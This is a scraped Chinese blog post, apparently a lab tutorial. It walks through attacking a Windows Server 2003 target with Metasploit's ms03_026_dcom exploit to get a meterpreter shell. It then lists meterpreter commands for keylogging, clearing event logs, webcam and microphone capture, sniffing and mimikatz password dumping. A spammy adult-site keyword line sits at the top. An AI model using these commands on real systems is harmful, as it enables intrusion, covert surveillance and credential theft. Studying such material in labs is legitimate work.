国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

信息收集

靶機的IP地址為:192.168.173.136

利用nmap工具掃描其開放端口、系統(tǒng)等
網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用
整理一下目標(biāo)系統(tǒng)的相關(guān)信息

系統(tǒng)版本:Windows server 2003

開放的端口及服務(wù):

21/tcp   	ftp
135/tcp  	msrpc
139/tcp  	netbios-ssn
445/tcp  	microsoft-ds
777/tcp  	multiling-http
1025/tcp 	NFS-or-IIS
1026/tcp 	LSA-or-nterm
1029/tcp 	ms-lsa
1030/tcp 	iad1
6002/tcp 	X11:2
7001/tcp 	afs3-callback
7002/tcp 	afs3-prserver
8099/tcp 	未知服務(wù)

漏洞分析

從掃描出的端口發(fā)現(xiàn),目標(biāo)主機開啟了135端口,服務(wù)為msrpc(遠程過程調(diào)用服務(wù)),即Windows的RPC服務(wù)。

?針對這個服務(wù),我們就可以嘗試去利用一下。

漏洞利用

kali機打開Metaspolit:

root@kali:~# msfconsole

查找所有跟Windows RPC相關(guān)的漏洞攻擊:

msf5 > search dcom

網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用
使用MS-03-026 進行攻擊:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 

為了實施攻擊,查看漏洞攻擊的選項和條件:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用
知道攻擊所需要的條件,接下來進行設(shè)置,只需要設(shè)置我們攻擊的目標(biāo)主機即可:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

設(shè)置好攻擊條件之后,接下來就進行攻擊:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用
執(zhí)行攻擊命令之后,我們獲取到了目標(biāo)主機的shell權(quán)限,現(xiàn)在,可以執(zhí)行命令查看目標(biāo)主機的一些東西,比如網(wǎng)絡(luò)配置信息:

meterpreter > ipconfig

網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用
如需進一步攻擊利用,可配合其他命令進一步操作。文章來源地址http://www.zghlxwxcb.cn/news/detail-488585.html

meterpreter下相關(guān)命令

基本系統(tǒng)命令
——————————
shell			進入目標(biāo)主機cmd shell
reboot			重啟目標(biāo)主機
shutdown		關(guān)閉目標(biāo)主機
sysinfo			查看目標(biāo)主機系統(tǒng)信息
background		將當(dāng)前會話放置后臺
info			查看已有信息模塊
run				執(zhí)行已有的模塊,輸入run后按tab鍵補全,會列出已有的腳本
clearav 		清除windows中的應(yīng)用程序日志、系統(tǒng)日志、安全日志
ipconfig		查看網(wǎng)絡(luò)配置信息
netstat			查看網(wǎng)絡(luò)連接信息
getproxy		查看代理信息
route			查看路由
arp				查看arp信息
進程列表:
——————————
getuid			獲取系統(tǒng)ID以及計算機名稱
getpid			獲取當(dāng)前進程標(biāo)識符
kill			結(jié)束進程
ps				列出正在運行中的進程
鼠標(biāo)/鍵盤操作
——————————
keyscan_start	開啟按鍵記錄會話
keyscan_stop	終止按鍵記錄會話
keyscan_dump	轉(zhuǎn)儲從目標(biāo)主機捕獲到的按鍵記錄
uictl enable mouse 		啟用鼠標(biāo)
uictl disable mouse  	禁用鼠標(biāo)
uictl enable keyboard	啟用鍵盤
uictl disable keyboard  禁用鍵盤
會話
——————————
enumdesktops	列舉所有可訪問到的桌面和工作站
getdesktop		獲取當(dāng)前Meterpreter桌面
setdesktop		變更Meterpreter當(dāng)前桌面
嗅探功能
——————————
use sniffer		加載嗅探功能
sniffer_interfaces   	查看網(wǎng)卡
sniffer_start	開始對網(wǎng)卡執(zhí)行嗅探
sniffer_stats	查看狀態(tài)
sniffer_stop	停止對網(wǎng)卡的嗅探
sniffer_dump	將捕獲到的目標(biāo)主機上的數(shù)據(jù)轉(zhuǎn)儲到本地
攝像頭命令
——————————
webcam_list		列舉系統(tǒng)所有的攝像頭
webcam_snap		使用目標(biāo)主機攝像頭拍照
record_mic		從主機的默認麥克風(fēng)中記錄環(huán)境聲音
webcam_stream	通過攝像頭開啟視頻
遠程桌面/截屏
——————————
enumdesktops	查看可用的桌面
getdesktop		獲取當(dāng)前meterpreter 關(guān)聯(lián)的桌面
set_desktop		設(shè)置meterpreter關(guān)聯(lián)的桌面  -h查看幫助
screenshot		截屏
use espia		或者使用espia模塊截屏  然后輸入screengrab
run vnc			使用vnc遠程桌面連接
抓取密碼
——————————
load mimikatz	查看幫助
wdigest			獲取Wdigest密碼
mimikatz_command -f samdump::hashes		執(zhí)行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

到了這里,關(guān)于網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • KALI LINUX網(wǎng)絡(luò)安全監(jiān)控工具

    Snort是一款常用的開源入侵檢測系統(tǒng),被廣泛應(yīng)用于滲透測試、網(wǎng)絡(luò)安全監(jiān)控和入侵檢測等領(lǐng)域。作為一名滲透測試工程師,了解Snort的原理、配置和使用方法是非常必要的。本文將詳細介紹Snort的工作原理、配置方法和使用技巧,希望可以幫助讀者更好的理解和應(yīng)用這個工具

    2024年02月02日
    瀏覽(36)
  • 深入探索:Kali Linux 網(wǎng)絡(luò)安全之旅

    深入探索:Kali Linux 網(wǎng)絡(luò)安全之旅

    目錄 前言 訪問官方網(wǎng)站 導(dǎo)航到下載頁面 啟動后界面操作 前言 \\\"Kali\\\" 可能指的是 Kali Linux,它是一種基于 Debian 的 Linux 發(fā)行版,專門用于滲透測試、網(wǎng)絡(luò)安全評估、數(shù)字取證和相關(guān)的安全任務(wù)。Kali Linux 旨在提供一系列用于測試網(wǎng)絡(luò)和系統(tǒng)安全性的工具,以及為安全專業(yè)人員

    2024年02月12日
    瀏覽(21)
  • Kali之MSF的MS08-067漏洞復(fù)現(xiàn)詳解

    Kali之MSF的MS08-067漏洞復(fù)現(xiàn)詳解

    MSF即Metasploit Framework,是一個綜合性的滲透測試工具,集成信息收集、漏洞掃描、漏洞利用以及提權(quán)等功能的工具。 目前安裝的kali都自帶MSF,可以直接在圖形界面打開 也可以在kali的終端通過使用命令msfconsole來打開。 1)msf的安裝目錄: ┌──(kali?kali)-[~] └─$ ls /usr/shar

    2023年04月08日
    瀏覽(22)
  • Kali系統(tǒng)MSF模塊暴力破解MySQL弱口令漏洞

    Kali系統(tǒng)MSF模塊暴力破解MySQL弱口令漏洞

    攻擊環(huán)境使用KALI系統(tǒng)(使用虛擬機搭建)的Metasploit模塊,msfconsole是metasploit中的一個工具,它集成了很多漏洞的利用的腳本,并且使用起來很簡單的網(wǎng)絡(luò)安全工具。 這里要特別強調(diào):被攻擊的環(huán)境必須開啟mysql遠程登陸服務(wù),通常MySQL開啟的端口號是3306,故而一般情況下要求

    2023年04月10日
    瀏覽(26)
  • 【文末送書】Kali Linux與網(wǎng)絡(luò)安全

    【文末送書】Kali Linux與網(wǎng)絡(luò)安全

    歡迎關(guān)注博主 Mindtechnist 或加入【智能科技社區(qū)】一起學(xué)習(xí)和分享Linux、C、C++、Python、Matlab,機器人運動控制、多機器人協(xié)作,智能優(yōu)化算法,濾波估計、多傳感器信息融合,機器學(xué)習(xí),人工智能等相關(guān)領(lǐng)域的知識和技術(shù)。關(guān)注公粽號 《機器和智能》 回復(fù) “python項目

    2024年02月08日
    瀏覽(22)
  • 「Kali Linux」網(wǎng)絡(luò)安全黑客自學(xué)、網(wǎng)絡(luò)滲透(文末送書)

    「Kali Linux」網(wǎng)絡(luò)安全黑客自學(xué)、網(wǎng)絡(luò)滲透(文末送書)

    目錄 1.背景介紹 2.讀者對象 3.隨書資源 4.本書目錄 5.本書概覽 6.活動參與方式? 對于企業(yè)網(wǎng)絡(luò)安全建設(shè)工作的質(zhì)量保障,業(yè)界普遍遵循PDCA(計劃(Plan)、實施(Do)、檢查(Check)、處理(Act))的方法論。近年來,網(wǎng)絡(luò)安全攻防對抗演練發(fā)揮了越來越重要的作用。 企業(yè)的安

    2024年02月08日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全-01-VMware安裝Kali&部署DVWA

    網(wǎng)絡(luò)安全-01-VMware安裝Kali&部署DVWA

    Kali linux是基于Debian的Linux的發(fā)行版,高級滲透測試及安全審核的工具。 ? kali linux: 1、包含600+滲透測試工具 2、完全免費 3、多語言 Kali linux鏡像下載地址: http://old.kali.org/kali-images/ ?? 2.1 新建虛擬機 選擇稍后安裝操作系統(tǒng),?下一步 選擇Linux, Debian 10.X 64位,?下一步 重

    2024年02月12日
    瀏覽(22)
  • Kali Linux:網(wǎng)絡(luò)與安全專家的終極武器

    Kali Linux:網(wǎng)絡(luò)與安全專家的終極武器

    Kali Linux,對于許多網(wǎng)絡(luò)和安全專業(yè)人士來說,這是一個無人不知、無人不曉的名字。它是專為網(wǎng)絡(luò)和安全測試、滲透測試以及數(shù)字取證等任務(wù)而設(shè)計的強大操作系統(tǒng)。本篇文章將深入介紹Kali Linux的特點、優(yōu)勢以及如何使用它來進行各種安全任務(wù)。 Kali Linux 是一款基于 Debian

    2024年02月06日
    瀏覽(21)
  • kali linux網(wǎng)絡(luò)安全弱口令爆破常用命令(二)

    Kali Linux中的Hydra是一款強大的網(wǎng)絡(luò)登錄破解工具,它支持多種協(xié)議,如FTP、SSH、Telnet等。弱口令爆破是一種常見的網(wǎng)絡(luò)攻擊手段,通過嘗試不同的用戶名和密碼組合來獲取系統(tǒng)的訪問權(quán)限。Hydra是一款強大的暴力破解工具,可以用于執(zhí)行弱口令爆破。 1. 主機(Host): 要嘗試

    2024年02月03日
    瀏覽(27)
  • 【網(wǎng)絡(luò)安全 | Kali】基于Docker的Vulhub安裝教程指南

    【網(wǎng)絡(luò)安全 | Kali】基于Docker的Vulhub安裝教程指南

    Vulhub的搭建基于docker及docker-compose 在安裝開始前,必須升級權(quán)限才可進行docker安裝 安裝步驟如下: 報錯是正常的,多次執(zhí)行命令即可。 如果還報錯,則運行如下命令: 再選擇y 切換目錄: 再查看目錄: 以activemq中的CVE-2015-5254為例,先切換目錄: 再切換到漏洞目錄: 啟動環(huán)

    2024年02月03日
    瀏覽(51)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包